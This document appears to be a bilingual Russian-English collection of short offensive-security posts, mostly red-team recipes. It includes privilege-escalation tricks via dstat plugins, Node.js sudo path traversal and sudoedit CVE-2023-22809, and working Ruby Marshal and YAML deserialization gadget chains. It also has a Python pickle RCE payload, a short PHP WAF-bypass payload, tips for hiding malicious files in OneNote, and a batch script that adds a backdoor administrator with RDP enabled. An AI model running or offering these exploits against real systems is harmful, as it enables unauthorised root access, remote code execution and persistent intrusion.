Kubernetes + Wireshark = KubeShark

По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:

Проверяем, что есть доступ к DockerHub

Совершаем установку:
sh <(curl -Ls https://kubeshark.co/install)

Запускаем:
kubeshark tap

Выбираем нужный POD и играемся:
kubeshark tap catalogue-b87b45784-sxc8q

Также можно выбрать определенный namespace:
kubeshark tap -n sock-shop

А можно все сразу:
kubeshark tap -A

Всю документацию можно найти здесь

Dstat Privilege Escalation

dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.

Находим директорию с dstat:
find / -type d -name dstat 2>/dev/null

Создаем плагин в той же директории, где и dstat с последующим кодом:
import os
os.system('chmod +s /usr/bin/bash')

Смотрим, что хост видит плагин:
dstat --list | grep <plugin_name>

Запускаем:
doas -u root /usr/bin/dstat –<plugin_name>

И получаем рута:
bash -p

Happy New Year 🎉🎊🎇

PHP Filter Chain Generator

Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.

Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче

Так php тэг, можно просто представить в следующем виде <?php ?> : <?= ?>

А функцию system('<cmd>'), мы можем просто заменить на ``

И самый простетский пэйлоад будет выглядеть так <?= `<cmd>` ?>

Очень недурная подборка тулзов для редтиминга.👁️‍🗨️

https://github.com/A-poc/RedTeam-Tools

Всем 🦫, а 🌎 Миру — мир!
#redteam #tools

Йо, всем!
Решил тут немного изучить Prototype Pollution.
Старался максимально по простому описать все, поэтому надеюсь, что всем понравится

Executing Shell Commands with Node.js

Если ты увидишь, что-то такое

(ALL) /usr/bin/node /usr/local/noscripts/*.js

То ты можешь попробовать сделать sudo-права через node.js

Создаем любой js файл с последующим кодом

const { exec } = require("child_process");
exec("chmod u+s /bin/bash", (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
console.log(`stdout: ${stdout}`);
});

Затем запускаем exec-func

sudo /usr/bin/node /usr/local/noscripts/../../../../../../folder-name/file.js

И там уже...

/bin/bash -p

Все благодарности вот этому челу

RedTeam With OneNote Sections

1. Not affected by Protected View/ MOTW
2. Allows embedding Malicious Excel/Word/PPT files that will be played without protected view
3. Allows embedding HTA, LNK, EXE files and spoof extensions
4. Possible to format document in a way user are tricked into opening a malicious file or a link

Ruby Insecure Deserialization

# RU

В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.

Снизу вы можете найти PoC

# EN

In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.

At the bottom you can find the PoC


require 'base64'
Gem::SpecFetcher
Gem::Installer
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)

# RU

Более подробно можно узнать здесь

# EN

Learn more here

https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_ruby.html

https://bishopfox.com/blog/ruby-vulnerabilities-exploits


# RU

Есть еще тулза

# EN

There is also a tool

https://github.com/klezVirus/deser-ruby

Ruby Deserialization via YAML file

# RU

Тут не будет каких-то подробностей, считайте дополнение к прошлому посту

Сама команда выполняется в git_set
Т. е сам YAML файл выглядит так

# EN

There won't be any details, just consider it an addition to the previous post

The command itself is executed in git_set
That is, the YAML file itself looks like this


---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve

# RU

А содержимое ruby скрипта будет таким

# EN

And the contents of the ruby noscript will be

require "yaml"
YAML.load(File.read("payload.yml"))

# RU

И потом делаем

# EN

And then do

ruby deser.rb

# RU

Да там будут ошибки, однако наша команда будет выполняться.

# EN

Yes, there will be mistakes, but our command will be executed.


THX:

https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565

https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/

https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

Python Deserialization via Pickle

# RU

У Python есть несколько методов сериализации объектов: Marshall и Pickle
Модуль Pickle реализует двоичные протоколы для сериализации и десериализации объектов Python. Однако модуль Pickle не является безопасным и лучше распаковывать только те данные, которым вы доверяете.

Для эксплуатации мы будем использовать следующий метод:
pickle.dumps(obj)

Помимо этого есть еще библиотека pickletools

Этот модуль содержит различные методы, относящиеся к внутренним деталям модуля pickle

Здесь нам потребуются два метода:
pickletools.optimize()
pickletools.dis()

Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем reduce в нашем классе


# EN


Python has several methods for serializing objects: Marshall and Pickle
The Pickle module implements binary protocols for serializing and deserializing Python objects. However, the Pickle module is not secure and will only decompress data that you trust.

We will use the following method to exploit it:
pickle.dumps(obj)

Apart from that there is also the pickletools library.

This module contains various methods related to the pickle module's internals

Here we need two methods:
pickletools.optimize()
pickletools.dis()

Now we can make our own payload to get the RCE. By the way, to serialize our payload as well, we use reduce in our class

PAYLOAD

import base64
import pickle
import pickletools
import subprocess
class anti_pickle_serum:
def reduce(self):
command = ['id']
return subprocess.check_output, (command,)
exploit_obj = anti_pickle_serum()
raw_pickle = pickle.dumps({"serum" : exploit_obj}, protocol=0)
optimized_pickle = pickletools.optimize(raw_pickle)
pickletools.dis(optimized_pickle)
payload = base64.b64encode(raw_pickle)
print(payload)


THX:

https://docs.python.org/3/library/pickle.html

https://davidhamann.de/2020/04/05/exploiting-python-pickle/

https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd

Sudoedit Privilege Escalation (CVE-2023-22809)

#RU

Проверьте, что вы можете использовать sudoedit

cat /etc/sudoers

Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root

export EDITOR='vim -- /path/to/your/files'

Теперь вы можете читать/писать файлы с привилегиями root

sudoedit /etc/custom/service.conf

#EN

Check that you can use sudoedit

cat /etc/sudoers

By introducing an extra dash, we can make our editor work as root

export EDITOR='vim -- /path/to/your/files'

Now you can read/write files with root

sudoedit /etc/custom/service.conf

Tools:

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc

Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

Обнимаю всех и надеюсь, что контент действительно заходит :)
Отдельно обнимаю @dnevnik_infosec